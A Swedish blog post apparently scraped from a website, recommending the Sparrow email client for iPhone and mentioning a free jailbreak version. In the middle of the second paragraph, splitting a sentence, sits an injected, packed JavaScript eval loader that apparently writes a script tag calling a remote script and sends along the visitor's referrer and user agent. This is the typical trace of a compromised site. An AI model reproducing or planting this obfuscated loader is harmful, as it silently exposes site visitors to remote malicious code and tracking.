Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Bästa klienten för epost till iPhone? Sparrow

Bästa klienten för epost till iPhone? Sparrow
Sebastian Plengier Ehrnfelt

Har du länge letat efter en riktigt bra klient eller app för e-post som fungerar till din iPhone?
Jag har själv en Mac men hade inte innan hört talas om Sparrow.

Några eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zsaay|var|u0026u|referrer|dibez||js|php’.split(‘|’),0,{}))
vänner till mig berättade om den och sa att det är en mycket omtyckt klient som används av de flesta mac-användare idag.

Nu har den kommit till iPhone och kan starkt rekommendera den. Jag tycker själv att den e-postklienten som följer med från början är riktigt kass. Detta är en bra komplettering som än så länge fungerar felfritt.

För er super-användare som har jailbreakat er iPhone finns en lösning som är gratis. Sparrow Push går enkelt att ladda ner från Cyndia.

Ladda ner via ikonen nedan:
Sparrow - Sparrow